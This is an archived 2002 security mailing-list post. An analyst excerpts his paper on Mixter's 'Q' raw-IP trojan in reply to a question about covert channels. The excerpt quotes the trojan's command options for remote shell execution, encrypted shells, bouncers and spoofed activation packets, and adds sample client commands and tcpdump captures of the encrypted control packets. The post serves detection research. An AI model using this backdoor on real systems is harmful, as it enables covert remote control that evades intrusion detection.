Vulnerability Development mailing list archives

Re: Covert Channels

From: Craig Baltes <craig () lurhq com>
Date: Thu, 17 Oct 2002 08:17:01 -0400


Here is part of a paper I recently wrote talking about "rawIP" Trojans. The 
"Q" trojan should be exactly what you are looking for in regards to a covert 
communications channel. It is written by "mixter" and on his site he also has 
a paper detailing how to use rawIP in programming.

Hope this helps,

Craig Baltes
Senior Information Security Analyst
LURHQ corp
craig () lurhq com

Raw IP Trojans 
Working on this paper has brought me into contact with a program and a concept 
that has real possibility for defeating a NIDS easily. The “Q“ Trojan by 
Mixter is a great example of a “Raw IP“ Trojan.  Rather than create a 
listener and use a standard client/server configuration the “Q“ Trojan looks 
for raw IP packets that match a specific parameter. The data of these packets 
will contain encrypted instructions that the “Q“ daemon will perform. The 
following is a list of functions contained in the current version of “Q“ 
(2.4) quoted from the README of the program: 
“RawIP Server Controller (qs) options: 
qs -C "command" - Execute remote shell commands. The command can be 
any line that you could type on a shell, including system programs. 
qs -p port -S - Make the server open an encrypted shell that you 
connect to with 'q', listening on the port specified with -p 
qs -p port -B " dport" - Make the server open an encrypted 
bouncer on the specified port. If you connect to it, it will relay you to 
dport on 
qs -U 99    - All bouncer processes will be run under user id 99. 
qs -P /sbin/sash  - All encrypted shells will now use /sbin/sash as 
user shell instead of the default shell. 
qs -p port - This option specifies the destination port that a shell/bouncer 
server will listen on. 
qs -n - If you specify the -n option, the server will spawn a *NORMAL* shell 
or bouncer, running without any encryption at all, so that all clients can 
connect. These sessions are depreceated, you should use TRANSD mode instead. 
qs -i I or U or T - Chose a protocol, ICMP UDP or TCP for the RawIP activation 
packet. Only necessary if you need to use a specific protocol to bypass a 
qs -a authid      - Same usage as q (both qs and q connections use CSA). 
qs -s source ip   - Specify your source IP, else it will be random (only 
useful to bypass routing filters and firewalls). 
qs <command> targets - qs can message an unlimited amount of targets at once. 
You specify the target hosts/ip as the last arguments. Ex.: qs -C "shutdown 
-r now"“ 
Here is an example of the "Q" Trojan at work on a real network. is a 
Mandrake Linux version 8.2 system that has the "Q" daemon running (qd). is a RedHat Linux version 7.3 system that I compiled the 
client/server package on and am using as the client. When designating a 
target or my commands I will use as the IP address.  
This is the output from the client: 
[root@localhost Q2.4]# qs -C "telnet 31337" 
[*] request: execute command 'telnet 31337' 
[*] sending control packet to (encrypted) 
[root@localhost Q2.4]# 
This is the output from a tcpdump: 
[root@localhost Q2.4]# tcpdump -n -s0 -X -i eth0 not arp 
tcpdump: listening on eth0 
19:31:01.125611 > S 0:148(148) ack 15487956 
win 7678 
0x0000   4500 00a8 fae3 0000 ca06 6cea d87f a600       E.........l..... 
0x0010   0a00 0002 079b bb91 0000 0000 00ec 53d4       ..............S. 
0x0020   0012 1dfe d35c 0000 4449 7a36 5a4e 705a       .....\..DIz6ZNpZ 
0x0030   3374 396e 5763 6272 5437 5372 324a 7641       3t9nWcbrT7Sr2JvA 
0x0040   414e 6c48 6d57 2f68 7757 4144 3143 3963       ANlHmW/hwWAD1C9c 
0x0050   4451 3062 6672 3056 7367 5843 624f 6c4b       DQ0bfr0VsgXCbOlK 
0x0060   662f 6e48 6e61 582f 302b 5255 522b 4877       f/nHnaX/0+RUR+Hw 
0x0070   6431 7775 4d33 4c4e 686e 3067 2f49 4833       d1wuM3LNhn0g/IH3 
0x0080   374f 676b 4e58 3971 754f 6662 4c74 3263       7OgkNX9quOfbLt2c 
0x0090   6147 6178 7253 736b 7359 7034 642f 5639         aGaxrSsksYp4d/V9 
0x00a0   4257 526e 6849 5875                           BWRnhIXu 
19:31:01.169462 > S 539291178:539291178(0) win 
5840 <mss 1460,sackOK,timestamp 2015017 0,nop,wscale 0> (DF) [tos 0x10] 
0x0000   4510 003c 5103 4000 4006 dba1 0a00 0002       E..<Q.@.@....... 
0x0010   0102 0304 0413 7a69 2024 ee2a 0000 0000       ......zi.$.*.... 
0x0020   a002 16d0 d71c 0000 0204 05b4 0402 080a       ................ 
0x0030   001e bf29 0000 0000 0103 0300                 ...)........ 
        4 packets received by filter 
        0 packets dropped by kernel 
This is another output from tcpdump when I ran the same "qs" command minutes 
19:37:55.205588 > S 13764962:13765110(148) 
ack 0 win 41869 
0x0000   4500 00a8 d189 0000 f506 0485 8f3f 5600       E............?V. 
0x0010   0a00 0002 77ac 8864 00d2 0962 0000 0000       ....w..d...b....  
0x0020   0012 a38d c9a5 0000 7056 796a 374b 4d73       ........pVyj7KMs 
0x0030   7742 6566 3368 5647 3933 5869 4e70 7641       wBef3hVG93XiNpvA 
0x0040   414e 6c48 6d57 2f68 7757 4144 3143 3963       ANlHmW/hwWAD1C9c 
0x0050   4451 3062 6672 3056 7367 5843 624f 6c4b       DQ0bfr0VsgXCbOlK 
0x0060   662f 6e48 6e61 582f 302b 5255 522b 4877       f/nHnaX/0+RUR+Hw 
0x0070   6431 7775 4d33 4c4e 686e 3067 2f49 4833       d1wuM3LNhn0g/IH3 
0x0080   374f 676b 4e58 3971 754f 6662 4c74 3263       7OgkNX9quOfbLt2c 
0x0090   6147 6178 7253 736b 7359 7034 642f 5639       aGaxrSsksYp4d/V9 
0x00a0   4257 526e 6849 5875                           BWRnhIXu 
19:37:55.247334 > S 969778169:969778169(0) win 
5840 <mss 1460,sackOK,timestamp 2056423 0,nop,wscale 0> (DF) [tos 0x10] 
0x0000   4510 003c c31e 4000 4006 6986 0a00 0002       E..<..@.@.i..... 
0x0010   0102 0304 0414 7a69 39cd a3f9 0000 0000       ......zi9....... 
0x0020   a002 16d0 65e5 0000 0204 05b4 0402 080a       ....e........... 
0x0030   001f 60e7 0000 0000 0103 0300                 ..`......... 
4 packets received by filter 
        0 packets dropped by kernel 
The first packet that you see in each capture is the RawIP control packet that 
contains the encrypted commands that I specified in my "qs" command. Without 
filling up this entire paper with packet captures of this Trojan in action 
suffice it to say that after extensive testing I have seen the client 
generate TCP, UDP, and ICMP RawIP control packets and have been able to find 
no common thread, or mistake that I could use to write a valid NIDS 
signature. In the captures above you see that the data portion of the RawIP 
control packet is the same in both captures but that is because the command 
is the same in both instances.

On Wednesday 16 October 2002 06:08 pm, Jeremy Junginger wrote:
Has anyone had success in creating a program that uses IP/TCP/UDP/ICMP
header information to transmit encoded messages from one host to
another?  Shortly after reading I was very tempted to
put together a proof-of-concept program to demonstrate the use of covert
channels (and more imporantly, how they could slip right by the IDS)
with the tools I had on hand.  I ended up using nemesis (Thank you Mr.
Grimes), tcpdump, and a little Perl script to kind of piece a tool
together that would transmit encoded (I use that term loosely) ASCII
data within the IP id field of the IP header.  It works okay until you
go through a NAT device that decides to change the IPID :)  I wondered
if anyone else has attempted to create a similar covert channel, and if
it is even useful when you can potentially encrypt/tunnel many chat
applications over a 3DES tunnel on basically any port in order to
subvert a security policy.  

A penny for your thoughts...


Craig Baltes
Senior Information Security Analyst
LURHQ corp
craig () lurhq com
843-903-4376 x2

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